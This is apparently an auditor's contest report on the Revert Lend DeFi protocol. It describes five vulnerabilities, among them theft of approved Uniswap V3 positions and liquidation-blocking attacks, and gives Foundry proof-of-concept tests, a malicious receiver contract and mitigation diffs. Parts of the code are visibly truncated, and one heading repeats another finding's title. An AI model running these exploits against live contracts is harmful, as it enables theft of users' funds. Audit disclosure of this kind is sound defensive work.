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Revert Lend

Contest Summary

Code under review: 2024-03-revert-lend (3000 nSLOC)

Contest Page: revert-lend-contest

Placement: #2/105+

Findings Summary

Severity Title
High-1 V3Utils.execute() does not have caller validation, leading to stolen NFT positions from users
High-2 Owner of a position can prevent liquidation due to the 'onERC721Received' callback
Medium-1 (Solo Finding) Incorrect liquidation fee calculation during underwater liquidation, disincentivizing liquidators to participate
Medium-2 (Solo Finding) AutoRange execution can be front-ran to avoid protocol fee, causing loss for protocol
Medium-3 Malicious user can prevent liquidation via front-running and repaying 1 wei worth, causing debtShares check to revert


[H-1] V3Utils.execute() does not have caller validation, leading to stolen NFT positions from users

Vulnerability Details

When a user wants to use V3Utils, one of the flows stated by the protocol is as follows:

  • TX1: User calls NPM.approve(V3Utils, tokenId)
  • TX2: User calls V3Utils.execute() with specific instructions

Note that this can't be done in one transaction since in TX1, the NPM has to be called directly by the EOA which owns the NFT, and thus the V3Utils.execute() would have to be called in a subsequent transaction.

Now this is usually a safe design pattern, but the issue is that V3Utils.execute() does not validate the owner of the UniV3 Position NFT that is being handled. This allows anybody to provide arbitrary instructions and call V3Utils.execute() once the NFT has been approved in TX1.

A malicious actor provide instructions that include the following:

  2. recipient= malicious_actor_address
  3. liquidity=total_position_liquidity

This would collect all liquidity from the position that was approved, and send it to the malicious attacker who didn't own the position.


The entire liquidity of a specific UniswapV3 liquidity provision NFT can be stolen by a malicious actor, with zero cost.

Proof of Concept

This foundry test demonstrates how an attacker can steal all the liquidity from a UniswapV3 position NFT that is approved to the V3Utils contract.

To run the PoC:

  1. Add the following foundry test to test/integration/V3Utils.t.sol
  2. Run the command forge test --via-ir --mt test_backRunApprovals_toStealAllFunds -vv in the terminal.
Foundry test
function test_backRunApprovals_toStealAllFunds() external {
  address attacker = makeAddr("attacker");

  uint256 daiBefore = DAI.balanceOf(attacker);
  uint256 usdcBefore = USDC.balanceOf(attacker);
  (,,,,,,, uint128 liquidityBefore,,,,) = NPM.positions(TEST_NFT_3);

  console.log("Attacker's DAI Balance Before: %e", daiBefore);
  console.log("Attacker's USDC Balance Before: %e", usdcBefore);
  console.log("Position #%s's liquidity Before: %e", TEST_NFT_3, liquidityBefore);

  // Malicious instructions used by attacker:
  V3Utils.Instructions memory bad_inst = V3Utils.Instructions(
      address(USDC), 0, 0, 0, 0, "", 0, 0, "", type(uint128).max, type(uint128).max, 0, 0, 0,
      liquidityBefore, // Attacker chooses to withdraw 100% of the position's liquidity
      attacker, // Recipient address of tokens

  // User approves V3Utils, planning to execute next
  NPM.approve(address(v3utils), TEST_NFT_3);
  // User's approval gets back-ran
  v3utils.execute(TEST_NFT_3, bad_inst);
  uint256 daiAfter = DAI.balanceOf(attacker);
  uint256 usdcAfter = USDC.balanceOf(attacker);
  (,,,,,,, uint128 liquidityAfter,,,,) = NPM.positions(TEST_NFT_3);

  console.log("Attacker's DAI Balance After: %e", daiAfter);
  console.log("Attacker's USDC Balance After: %e", usdcAfter);
  console.log("Position #%s's liquidity After: %e", TEST_NFT_3, liquidityAfter);

Console output:

Ran 1 test for test/integration/V3Utils.t.sol:V3UtilsIntegrationTest
[PASS] test_backRunApprovals_toStealAllFunds() (gas: 351245)
Attacker's DAI Balance Before: 0e0
Attacker's USDC Balance Before: 0e0
Position #4660's liquidity Before: 1.2922419498089422291e19


Attacker's DAI Balance After: 4.2205702812280886591005e22
Attacker's USDC Balance After: 3.5931648355e10
Position #4660's liquidity After: 0e0

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.17s

Ran 1 test suite in 1.17s: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Manual Review

Recommended Mitigation Steps

Add a check to ensure that only the owner of the position can call V3Utils.execute.

Note that the fix also checks for the case where a user may have transferred the token into the V3Utils, since in that case it is fine that msg.sender != tokenOwner since tokenOwner would then be the V3Utils contract itself.

function execute(uint256 tokenId, Instructions memory instructions) public returns (uint256 newTokenId) {
+       address tokenOwner = nonfungiblePositionManager.ownerOf(tokenId);
+       if (tokenOwner != msg.sender && tokenOwner != address(this)) {
+           revert Unauthorized();
+       }
  /* REST OF CODE */

[H-2] V3Utils.execute() does not have caller validation, leading to stolen NFT positions from users

Vulnerability Description

When liquidating a position, _cleanUpLoan() is called on the loan. This attempts to send the uniswap LP position back to the user via the following line:

nonfungiblePositionManager.safeTransferFrom(address(this), owner, tokenId);

This safeTransferFrom function call invokes the onERC721Received function on the owner's contract. The transaction will only succeed if the owner's contract returns the function selector of the standard onERC721Received function. However, the owner can design the function to return an invalid value, and this would lead to the safeTransferFrom reverting, thus being unable to liquidate the user.


This leads to bad debt accrual in the protocol which cannot be prevented, and eventually insolvency.

Proof of Concept

Here is a foundry test that proves this vulnerability.

To run the PoC:

  1. Copy the attacker contract into test/integration/V3Vault.t.sol
  2. In the same file, copy the contents of the 'foundry test' dropdown into the V3VaultIntegrationTest contract
  3. In the terminal, enter forge test --via-ir --mt test_preventLiquidation -vv
Attacker Contract
contract MaliciousBorrower {

address public vault;

constructor(address _vault) {
    vault = _vault;
function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data) external returns (bytes4) {

    // Does not accept ERC721 tokens from the vault. This causes liquidation to revert
    if (from == vault) return bytes4(0xdeadbeef);

    else return msg.sig;
Foundry test
function test_preventLiquidation() external {
    // Create malicious borrower, and setup a loan
    address maliciousBorrower = address(new MaliciousBorrower(address(vault)));
    custom_setupBasicLoan(true, maliciousBorrower);

    // assert: debt is equal to collateral value, so position is not liquidatable
    (uint256 debt,,uint256 collateralValue, uint256 liquidationCost, uint256 liquidationValue) = vault.loanInfo(TEST_NFT);
    assertEq(debt, collateralValue);

    // collateral DAI value change -100%
        abi.encode(uint80(0), int256(0), block.timestamp, block.timestamp, uint80(0))
    // ignore difference

    // assert that debt is greater than collateral value (position is liquidatable now)
    (debt, , collateralValue, liquidationCost, liquidationValue) = vault.loanInfo(TEST_NFT);
    assertGt(debt, collateralValue);

    (uint256 debtShares) =;

    USDC.approve(address(vault), liquidationCost);

    // This fails due to malicious owner. So under-collateralised position can't be liquidated. DoS!
    vm.expectRevert("ERC721: transfer to non ERC721Receiver implementer");
    vault.liquidate(IVault.LiquidateParams(TEST_NFT, debtShares, 0, 0, WHALE_ACCOUNT, ""));

function custom_setupBasicLoan(bool borrowMax, address borrower) internal {
    // lend 10 USDC
    _deposit(10000000, WHALE_ACCOUNT); 

    // Send the test NFT to borrower account
    NPM.transferFrom(TEST_NFT_ACCOUNT, borrower, TEST_NFT);

    uint256 tokenId = TEST_NFT;

    // borrower adds collateral
    NPM.approve(address(vault), tokenId);
    vault.create(tokenId, borrower);

    (,, uint256 collateralValue,,) = vault.loanInfo(tokenId);

    // borrower borrows assets, backed by their univ3 position
    if (borrowMax) {
        // borrow max
        vault.borrow(tokenId, collateralValue);
Terminal output
Ran 1 test for test/integration/V3Vault.t.sol:V3VaultIntegrationTest
[PASS] test_preventLiquidation() (gas: 1765928)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 473.56ms

Tools Used

Manual Review

Recommended Mitigation Steps

One solution would be to approve the NFT to the owner and provide a way (via the front-end or another contract) for them to redeem the NFT back later on. This is a 'pull over push' approach and ensures that the liquidation will occur.


function _cleanupLoan(uint256 tokenId, uint256 debtExchangeRateX96, uint256 lendExchangeRateX96, address owner)
    _removeTokenFromOwner(owner, tokenId);
    _updateAndCheckCollateral(tokenId, debtExchangeRateX96, lendExchangeRateX96, loans[tokenId].debtShares, 0);
    delete loans[tokenId];
-        nonfungiblePositionManager.safeTransferFrom(address(this), owner, tokenId);
+       nonfungiblePositionManager.approve(owner, tokenId);
    emit Remove(tokenId, owner);

[M-1] Incorrect liquidation fee calculation during underwater liquidation, disincentivizing liquidators to participate

Vulnerability Description

As stated in the Revert Lend Whitepaper, the liquidation fee for underwater positions is supposed to be 10% of the debt.

However the code within V3Vault::_calculateLiquidation (shown below) calculates the liquidation fee as 10% of the fullValue rather than 10% of the debt.

  } else {
      // all position value
      liquidationValue = fullValue;

      uint256 penaltyValue = fullValue * (Q32 - MAX_LIQUIDATION_PENALTY_X32) / Q32;
      liquidatorCost = penaltyValue;
      reserveCost = debt - penaltyValue;

Note: fullValue * (Q32 - MAX_LIQUIDATION_PENALTY_X32) / Q32; is equivalent to fullValue * 90%.

A permalink to the code snippet is here


As the fullValue decreases below debt (since the position is underwater), liquidators are less-and-less incentivised to liquidate the position. This is because as fullValue decreases, the liquidation fee (10% of fullValue) also decreases.

This goes against the protocol's intention (stated in the whitepaper) that the liquidation fee will be fixed at 10% of the debt for underwater positions, breaking core protocol functionality.

Proof of Concept

Code snippet from V3Vault._calculateLiquidation:

Recommended Mitigation Steps

Ensure that the liquidation fee is equal to 10% of the debt. Make the following changes in V3Vault::_calculateLiquidation():

else {
-// all position value
-liquidationValue = fullValue;

-uint256 penaltyValue = fullValue * (Q32 - MAX_LIQUIDATION_PENALTY_X32) / Q32;
-liquidatorCost = penaltyValue;
-reserveCost = debt - penaltyValue;

+uint256 penalty = debt * (MAX_LIQUIDATION_PENALTY_X32) / Q32; //[10% of debt]
+liquidatorCost = fullValue - penalty;
+liquidationValue = fullValue;
+reserveCost = debt - liquidatorCost; // Remaining to pay.

[M-2] AutoRange execution can be front-ran to avoid protocol fee, causing loss for protocol

Vulnerability Description

When users configure their NFT within the AutoRange contract, they have 2 options for fee-handling:

  1. Protocol takes 0.15% of the entire position size.
  2. Protocol takes a higher fee of 2%, but only from the position's collected fees. The user sets PositionConfig.onlyFees=false for the first option, and onlyFees=true for the second option.

When an operator calls the AutoRange.execute() function, they set the reward parameter rewardX64 based on the user's PositionConfig.

However the execution can be front-ran by the user, and they can change the onlyFees boolean which changes the fee handling logic, while the rewardX64 parameter set by the operator is unchanged.

The user can exploit this to their advantage by initially setting onlyFees to false, so that the operator will call the function with only 0.15% reward percentage. But when the operator sends their transaction, the user front-runs it by changing onlyFees to true. Now, the protocol only gets 0.15% of the fees collected when they initially intended to collect 0.15% of the entire position.


The cost of executing the swap is likely to exceed the fees obtained (since expected fee is 0.15% of entire position, but only 0.15% of fees are obtained). This leads to loss of funds for the protocol.

Note: this has been submitted as only a medium severity issue since the protocol's off-chain operator logic can simply blacklist such users once they have performed the exploit.

Proof of Concept

The rewardX64 parameter:

Docs regarding fee source:

Tools Used

Manual Review

Recommended Mitigation Steps

Let the operator pass in 2 different values for rewardX64, where each one corresponds to a different value of onlyFees. This way, the rewardX64 parameter passed in will not be inconsistent with the executed logic.

[M-3] Repayments and liquidations can be forced to revert by an attacker that repays miniscule amount of shares

Vulnerability Details

When liquidating a position, the following check occurs, to ensure that the params.debtShares passed in by the liquidator is equal to the actual debtShares of the loan:

uint256 debtShares = loans[params.tokenId].debtShares;

if (debtShares != params.debtShares) {
    revert DebtChanged();

A malicious position owner can simply frontrun this liquidation transaction with their own transaction where they repay 1 wei of the loan, and this reduces .debtShares by 1 wei. The position is still undercollateralised, so should be liquidated.

But now that debtShares has changed, the above check will fail in the liquidator's transaction, and the liquidation will revert.

In addition, here is a very similar finding in the C4 Venus contest (May 2023)


This is a denial of service for liquidators and can lead to bad debt accrual in the vault + also wasted gas for liquidators. It only costs 1 wei + gas fee for the attacker to perform the attack, so it is cheap.

Proof of Concept

In test/integration/V3Vault.t.sol, replace _testLiquidation() with the function in the provided dropdown.

Note: the only real change made was adding the repayment logic right before the liquidation, to simulate frontrunning the liquidation's transaction.

Then to run the PoC, enter in the terminal forge test --via-ir --mt testLiquidationTimeBased -vv

Updated version of _testLiquidation()
function _testLiquidation(LiquidationType lType) internal {

        (, uint256 fullValue, uint256 collateralValue,,) = vault.loanInfo(TEST_NFT);
        assertEq(collateralValue, 8847206);
        assertEq(fullValue, 9830229);

        // debt is equal collateral value
        (uint256 debt,,, uint256 liquidationCost, uint256 liquidationValue) = vault.loanInfo(TEST_NFT);
        assertEq(debt, collateralValue);
        assertEq(liquidationCost, 0);
        assertEq(liquidationValue, 0);

        if (lType == LiquidationType.TimeBased) {
            // wait 7 day - interest growing
            vm.warp(block.timestamp + 7 days);
        } else if (lType == LiquidationType.ValueBased) {
            // collateral DAI value change -100%
                abi.encode(uint80(0), int256(0), block.timestamp, block.timestamp, uint80(0))
        } else {
            vault.setTokenConfig(address(DAI), uint32(Q32 * 2 / 10), type(uint32).max); // 20% collateral factor

        if (lType == LiquidationType.ValueBased) {
            // should revert because oracle and pool price are different
            (debt, fullValue, collateralValue, liquidationCost, liquidationValue) = vault.loanInfo(TEST_NFT);

            // ignore difference - now it will work

        // debt is greater than collateral value
        (debt, fullValue, collateralValue, liquidationCost, liquidationValue) = vault.loanInfo(TEST_NFT);

        // debt only grows in time based scenario
            lType == LiquidationType.TimeBased ? 8869647 : (lType == LiquidationType.ValueBased ? 8847206 : 8847206)

        // collateral value is lower in non time based scenario
            lType == LiquidationType.TimeBased ? 8847206 : (lType == LiquidationType.ValueBased ? 8492999 : 1966045)
            lType == LiquidationType.TimeBased ? 9830229 : (lType == LiquidationType.ValueBased ? 9436666 : 9830229)

        assertGt(debt, collateralValue);
            lType == LiquidationType.TimeBased ? 8869647 : (lType == LiquidationType.ValueBased ? 8492999 : 8847206)
            lType == LiquidationType.TimeBased ? 9226564 : (lType == LiquidationType.ValueBased ? 9436666 : 9729910)

        USDC.approve(address(vault), liquidationCost - 1);

        (uint256 debtShares) =;

        vm.expectRevert("ERC20: transfer amount exceeds allowance");
        vault.liquidate(IVault.LiquidateParams(TEST_NFT, debtShares, 0, 0, WHALE_ACCOUNT, ""));

        USDC.approve(address(vault), liquidationCost);

        uint256 daiBalance = DAI.balanceOf(WHALE_ACCOUNT);
        uint256 usdcBalance = USDC.balanceOf(WHALE_ACCOUNT);

        // Frontrunning!
        USDC.approve(address(vault), type(uint256).max);
        vault.repay(TEST_NFT, 1, true);

        vault.liquidate(IVault.LiquidateParams(TEST_NFT, debtShares, 0, 0, WHALE_ACCOUNT, ""));

Tools Used

Manual Review

Recommended Mitigation Steps

Consider: Instead of reverting the transaction, just use the actual value of debtShares within the loan struct and continue with the liquidation of the under-collateralised position.